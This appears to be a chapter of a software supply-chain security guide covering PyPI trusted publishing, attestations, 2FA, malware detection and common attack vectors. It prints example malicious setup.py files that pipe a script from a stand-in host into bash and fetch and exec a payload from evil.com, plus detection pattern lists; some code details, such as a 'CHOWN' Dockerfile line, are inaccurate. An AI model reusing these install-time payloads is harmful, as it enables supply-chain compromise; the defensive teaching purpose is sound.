Skip to content

PyPI/Python Ecosystem Security

SECURITY LEADER The Python Package Index (PyPI) has emerged as a leader in package ecosystem security, implementing innovative features like trusted publishing, attestations, and comprehensive security policies. These advances make PyPI a model for other package ecosystems to follow.

PyPI Ecosystem Overview

Scale and Characteristics

PyPI serves the Python community with impressive scale and security-focused features:

  • 400,000+ packages with steady, quality-focused growth
  • ~6 billion downloads per month across all packages
  • Trusted publishing with OIDC for secure package uploads
  • Digital attestations for package provenance verification
  • Strong security policies and incident response procedures

PyPI Security Evolution

PyPI has undergone significant security improvements over recent years:

timeline
    title PyPI Security Evolution

    2018 : Legacy PyPI retirement
         : Move to Warehouse (modern codebase)
         : Basic 2FA support

    2019 : Mandatory 2FA for critical projects
         : Improved audit logging
         : Security key support

    2020 : API token system
         : Enhanced monitoring
         : Vulnerability reporting program

    2021 : Malware detection system
         : Improved package scanning
         : Security policies enforcement

    2022 : Trusted publishing (OIDC)
         : Digital attestations
         : Enhanced threat intelligence

    2023 : Comprehensive attestation support
         : Advanced security analytics
         : Ecosystem-wide security improvements

Trusted Publishing: PyPI's Security Innovation

What is Trusted Publishing?

Trusted publishing uses OpenID Connect (OIDC) to establish cryptographic trust between PyPI and external systems like GitHub Actions, eliminating the need for long-lived API tokens.

sequenceDiagram
    participant GHA as GitHub Actions
    participant OIDC as GitHub OIDC Provider
    participant PyPI as PyPI
    participant Package as Package Registry

    Note over GHA,Package: Trusted Publishing Flow

    GHA->>OIDC: Request OIDC token for workflow
    OIDC->>GHA: Return signed JWT token
    GHA->>PyPI: Present OIDC token for authentication
    PyPI->>OIDC: Verify token signature and claims
    OIDC->>PyPI: Token validation response
    PyPI->>PyPI: Check token claims against project configuration
    PyPI->>GHA: Grant publish permissions
    GHA->>Package: Upload package with verified identity

Benefits of Trusted Publishing

  1. No Long-lived Secrets: Eliminates API tokens in CI/CD environments
  2. Cryptographic Trust: Uses public key cryptography for verification
  3. Granular Permissions: Specific repository and workflow authorization
  4. Audit Trail: Complete logging of publishing actions
  5. Reduced Attack Surface: No credentials to steal or compromise

Setting Up Trusted Publishing

# .github/workflows/publish.yml
name: Publish to PyPI

on:
  release:
    types: [published]

jobs:
  publish:
    runs-on: ubuntu-latest
    permissions:
      id-token: write  # Required for OIDC token
      contents: read

    steps:
      - uses: actions/checkout@v4

      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.x'

      - name: Install build dependencies
        run: python -m pip install build

      - name: Build package
        run: python -m build

      - name: Publish to PyPI
        uses: pypa/gh-action-pypi-publish@release/v1
        # No API token needed with trusted publishing!

PyPI Project Configuration:

# Configure trusted publishing on PyPI
1. Go to PyPI project management page
2. Add GitHub as trusted publisher
3. Specify: owner/repository, workflow filename, environment (optional)
4. No API token configuration needed

Digital Attestations and Provenance

Package Attestations

PyPI supports digital attestations that provide cryptographic proof of package origins:

{
  "_type": "https://in-toto.io/Statement/v0.1",
  "subject": [
    {
      "name": "my_package-1.0.0-py3-none-any.whl",
      "digest": {
        "sha256": "abcd1234..."
      }
    }
  ],
  "predicateType": "https://slsa.dev/provenance/v0.2",
  "predicate": {
    "builder": {
      "id": "https://github.com/actions/runner/github-hosted"
    },
    "buildType": "https://github.com/actions/workflow@v1",
    "invocation": {
      "configSource": {
        "uri": "git+https://github.com/owner/repo@refs/heads/main",
        "digest": {
          "sha1": "def5678..."
        }
      }
    },
    "metadata": {
      "buildInvocationId": "123456789",
      "buildStartedOn": "2023-01-01T00:00:00Z"
    }
  }
}

Verifying Attestations

# Install verification tools
pip install sigstore

# Verify package attestations
python -m sigstore verify identity \
  --cert-identity https://github.com/owner/repo/.github/workflows/publish.yml@refs/heads/main \
  --cert-oidc-issuer https://token.actions.githubusercontent.com \
  package.whl package.whl.sig

PyPI Security Features

1. Multi-Factor Authentication

PyPI requires 2FA for maintainers of critical projects:

# Enable 2FA on PyPI account
1. Visit PyPI account settings
2. Add authentication application (TOTP)
3. Add security keys (FIDO2/WebAuthn) - recommended
4. Download recovery codes

# Critical projects automatically require 2FA
# Affects ~4,000 projects covering ~90% of PyPI downloads

2. API Token Security

PyPI provides scoped API tokens with limited permissions:

# Create scoped API token
1. Generate token with specific project scope
2. Set token expiration date
3. Limit token to specific actions (upload only)
4. Use token in CI/CD instead of password

# Token format provides metadata
pypi-AgEIcHlwaS5vcmcCJDAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwMAACKlsxLCJwcm9qZWN0LXJlYWQiXQAABiAJYWJjZGVmZ2hpams...

3. Malware Detection

PyPI implements automated malware detection:

# Example malware patterns PyPI detects
suspicious_patterns = [
    "eval(base64.b64decode(",     # Base64 encoded execution
    "exec(compile(",              # Dynamic compilation
    "__import__('os').system(",   # OS command execution
    "socket.socket(",             # Network connections
    "subprocess.Popen(",          # Process spawning
]

# PyPI scanning process
1. Automated scanning of all uploaded packages
2. Machine learning-based malware detection
3. Human review for suspicious packages
4. Rapid response for confirmed malware

4. Package Integrity

PyPI ensures package integrity through multiple mechanisms:

# SHA256 hashes for all files
https://files.pythonhosted.org/packages/a1/b2/c3.../package-1.0.0.tar.gz
# Hash: sha256:abcd1234efgh5678ijkl9012mnop3456qrst7890uvwx1234yz567890

# Package verification
pip install package==1.0.0 --hash=sha256:abcd1234efgh5678ijkl9012mnop3456qrst7890uvwx1234yz567890

Python Package Installation Security

pip Installation Process

Understanding pip's installation process reveals security considerations:

# pip install security analysis
1. Resolve package dependencies from PyPI
2. Download package files (wheel or source)
3. Verify package integrity (SHA256)
4. Install package files
5. Execute setup.py (for source distributions)
6. Run post-install scripts if present

Security Implications

# setup.py can execute arbitrary code
from setuptools import setup
import os
import subprocess

# This code runs during installation!
os.system("curl -s malicious-site.com/script.sh | bash")

setup(
    name="malicious-package",
    version="1.0.0",
    # ... package configuration
)

Secure Installation Practices

# Use specific versions and hashes
pip install package==1.0.0 --hash=sha256:known_good_hash

# Install from wheels when possible (no setup.py execution)
pip install package --only-binary=all

# Use virtual environments for isolation
python -m venv myenv
source myenv/bin/activate
pip install package

# Check package before installation
pip download package
# Inspect contents before installing

Common PyPI Attack Vectors

1. Typosquatting

Despite security measures, typosquatting remains a concern:

# Legitimate packages vs malicious variants
requests    ->  request, requsts, reqeusts
numpy       ->  nympy, numpi, numpy-dev
django      ->  djago, django-admin, djangos
flask       ->  falsk, flask-login, flasks

2. Dependency Confusion

Exploiting package name resolution:

# Example attack scenario
# 1. Attacker identifies internal package name
# 2. Publishes package with same name to PyPI
# 3. Developer accidentally installs public version

# Protection: Use private package index
pip install package --index-url https://private-pypi.company.com/

3. Setup.py Exploitation

Malicious code in setup.py files:

# Example malicious setup.py
from setuptools import setup
import base64
import urllib.request

# Download and execute malicious payload
payload = urllib.request.urlopen('https://evil.com/payload.py').read()
exec(compile(base64.b64decode(payload), '<string>', 'exec'))

setup(name='innocent-package', version='1.0.0')

4. Package Takeover

Compromising existing packages:

  1. Account compromise: Stealing maintainer credentials
  2. Social engineering: Convincing maintainers to add attackers
  3. Package abandonment: Taking over unmaintained packages
  4. Transfer exploitation: Exploiting package ownership transfers

Advanced PyPI Security

1. Private Package Repositories

Setting up secure private PyPI repositories:

# Using devpi for private PyPI
pip install devpi-server devpi-client

# Start devpi server
devpi-server --start

# Configure client
devpi use http://localhost:3141
devpi user -c testuser password=123
devpi login testuser
devpi index -c dev

# Upload private packages
devpi upload

2. Package Verification Scripts

#!/usr/bin/env python3
"""
PyPI Package Security Verification Script
"""

import requests
import hashlib
import json
import zipfile
import ast
import re
from pathlib import Path

class PyPISecurityVerifier:
    def __init__(self):
        self.suspicious_patterns = [
            r'eval\s*\(',
            r'exec\s*\(',
            r'__import__\s*\(',
            r'subprocess\.',
            r'os\.system',
            r'socket\.socket',
            r'urllib\.request',
            r'base64\.b64decode',
        ]

    def check_package_metadata(self, package_name):
        """Check package metadata for suspicious indicators."""
        url = f"https://pypi.org/pypi/{package_name}/json"
        response = requests.get(url)

        if response.status_code != 200:
            return {"error": "Package not found"}

        data = response.json()
        info = data['info']

        # Security checks
        checks = {
            "package_age": self._check_package_age(data),
            "maintainer_count": len(info.get('maintainer_email', '').split(',')),
            "download_stats": self._get_download_stats(package_name),
            "version_frequency": self._check_version_frequency(data),
            "has_source_distribution": self._has_source_distribution(data),
        }

        return checks

    def analyze_source_code(self, package_path):
        """Analyze package source code for suspicious patterns."""
        suspicious_files = []

        for py_file in Path(package_path).rglob("*.py"):
            with open(py_file, 'r', encoding='utf-8', errors='ignore') as f:
                content = f.read()

                # Check for suspicious patterns
                for pattern in self.suspicious_patterns:
                    if re.search(pattern, content):
                        suspicious_files.append({
                            "file": str(py_file),
                            "pattern": pattern,
                            "line": self._find_line_number(content, pattern)
                        })

        return suspicious_files

    def verify_package_integrity(self, package_name, version):
        """Verify package integrity using PyPI checksums."""
        url = f"https://pypi.org/pypi/{package_name}/{version}/json"
        response = requests.get(url)
        data = response.json()

        files = data['urls']
        verification_results = []

        for file_info in files:
            file_url = file_info['url']
            expected_hash = file_info['digests']['sha256']

            # Download and verify
            file_response = requests.get(file_url)
            actual_hash = hashlib.sha256(file_response.content).hexdigest()

            verification_results.append({
                "filename": file_info['filename'],
                "expected_hash": expected_hash,
                "actual_hash": actual_hash,
                "verified": expected_hash == actual_hash
            })

        return verification_results

    def _check_package_age(self, data):
        # Implementation details...
        pass

    def _get_download_stats(self, package_name):
        # Implementation details...
        pass

# Usage example
verifier = PyPISecurityVerifier()
results = verifier.check_package_metadata("requests")
print(json.dumps(results, indent=2))

3. Dependency Pinning and Lock Files

# requirements.txt with hashes
requests==2.31.0 \
    --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f \
    --hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1

# Using pip-tools for dependency management
pip install pip-tools

# Create requirements.in
echo "requests" > requirements.in

# Generate locked requirements with hashes
pip-compile --generate-hashes requirements.in

# Install with verification
pip-sync requirements.txt

4. CI/CD Security for Python Projects

# Secure Python CI/CD pipeline
name: Python Security Pipeline

on: [push, pull_request]

jobs:
  security:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'

      - name: Install security tools
        run: |
          pip install safety bandit semgrep

      - name: Check for known vulnerabilities
        run: |
          # Check for vulnerable packages
          safety check

      - name: Static security analysis
        run: |
          # Security linting with bandit
          bandit -r src/

      - name: Semantic security analysis
        run: |
          # Advanced pattern matching
          semgrep --config=auto src/

      - name: Dependency analysis
        run: |
          # Generate and check SBOM
          pip install cyclonedx-bom
          cyclonedx-py -o sbom.json

      - name: Upload SBOM
        uses: actions/upload-artifact@v3
        with:
          name: python-sbom
          path: sbom.json

PyPI vs Other Ecosystems

Security Feature Comparison

Feature PyPI npm Maven Central NuGet
Trusted Publishing ✅ Full OIDC support ❌ Not available ❌ Not available ❌ Not available
Digital Attestations ✅ Full support 🔶 Experimental ❌ Not available ❌ Not available
Mandatory 2FA ✅ Critical projects 🔶 High-impact packages ❌ Optional ❌ Optional
Malware Detection ✅ Automated + manual 🔶 Basic detection 🔶 Basic scanning 🔶 Basic scanning
Package Signing ✅ Built-in attestations 🔶 Experimental ✅ PGP signing ✅ Code signing

What Other Ecosystems Can Learn

  1. Trusted Publishing Model: Eliminates long-lived secrets in CI/CD
  2. Proactive Security Policies: Mandatory 2FA for critical projects
  3. Comprehensive Attestations: Full provenance tracking
  4. Community Engagement: Active security community involvement
  5. Rapid Incident Response: Quick response to security issues

Developer Environment Protection

1. Virtual Environment Security

# Secure virtual environment practices
python -m venv --prompt="secure-project" venv
source venv/bin/activate

# Verify environment isolation
which python
which pip

# Install with verification
pip install --require-hashes -r requirements.txt

# Regular environment cleanup
deactivate
rm -rf venv

2. Package Installation Monitoring

# Monitor package installations
import sys
import importlib.util
from functools import wraps

def monitor_imports(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        if args and isinstance(args[0], str):
            package_name = args[0]
            print(f"🔍 Importing package: {package_name}")

            # Check for suspicious packages
            if is_suspicious_package(package_name):
                print(f"⚠️ Warning: Suspicious package detected: {package_name}")

        return func(*args, **kwargs)
    return wrapper

# Patch import mechanism
original_import = __builtins__.__import__
__builtins__.__import__ = monitor_imports(original_import)

3. Sandboxed Development

# Using containers for Python development
# Dockerfile.python-dev
FROM python:3.11-slim

# Create non-root user
RUN useradd -m -u 1000 developer

# Install security tools
RUN pip install safety bandit

# Set up workspace
WORKDIR /workspace
CHOWN developer:developer /workspace

# Switch to non-root user
USER developer

# Entry point
CMD ["bash"]

Incident Response: PyPI Security Breaches

Historical Incidents

  1. 2019 - Jellyfish Package: Cryptocurrency miner in package
  2. 2020 - Python Package Backdoor: Banking trojan distribution
  3. 2021 - Dependency Confusion: Major companies affected
  4. 2022 - Crypto Package Attacks: Multiple malicious packages

PyPI's Response Improvements

  1. Automated Detection: Machine learning-based malware detection
  2. Rapid Response: Sub-hour response times for confirmed threats
  3. Community Reporting: Easy reporting mechanisms for users
  4. Transparency: Public incident reports and lessons learned

Lessons for Organizations

# PyPI Incident Response Lessons

## Prevention
- Implement trusted publishing where possible
- Use package verification and attestations
- Maintain comprehensive package inventories
- Regular security training for developers

## Detection
- Monitor package installations and updates
- Implement SBOM tracking and analysis
- Use automated vulnerability scanning
- Establish baseline behavior patterns

## Response
- Have pre-planned incident response procedures
- Maintain communication channels with package maintainers
- Implement rapid rollback capabilities
- Document lessons learned for future improvement

Future of PyPI Security

Ongoing Initiatives

  1. SLSA Framework Integration: Enhanced supply chain security standards
  2. Sigstore Adoption: Keyless signing for all packages
  3. Machine Learning Enhancement: Improved threat detection
  4. Cross-Ecosystem Collaboration: Sharing security innovations
  1. Adopt Trusted Publishing: Eliminate long-lived tokens
  2. Verify Attestations: Check package provenance
  3. Use Security Tools: Integrate safety, bandit, and others
  4. Stay Informed: Follow PyPI security announcements
  5. Contribute Back: Report issues and improve ecosystem security

Conclusion

PyPI has emerged as a security leader in the package ecosystem space, demonstrating how proactive security measures can significantly improve ecosystem security. Key innovations include:

  1. Trusted Publishing: Eliminating long-lived secrets
  2. Digital Attestations: Cryptographic provenance verification
  3. Proactive Policies: Mandatory 2FA for critical projects
  4. Community Engagement: Active security community involvement
BEST PRACTICE Organizations should look to PyPI's security model as a template for secure package management. The trusted publishing and attestation features represent the future direction for package ecosystem security.

The next section covers Maven/Java Ecosystem Security, which has its own unique security characteristics and challenges.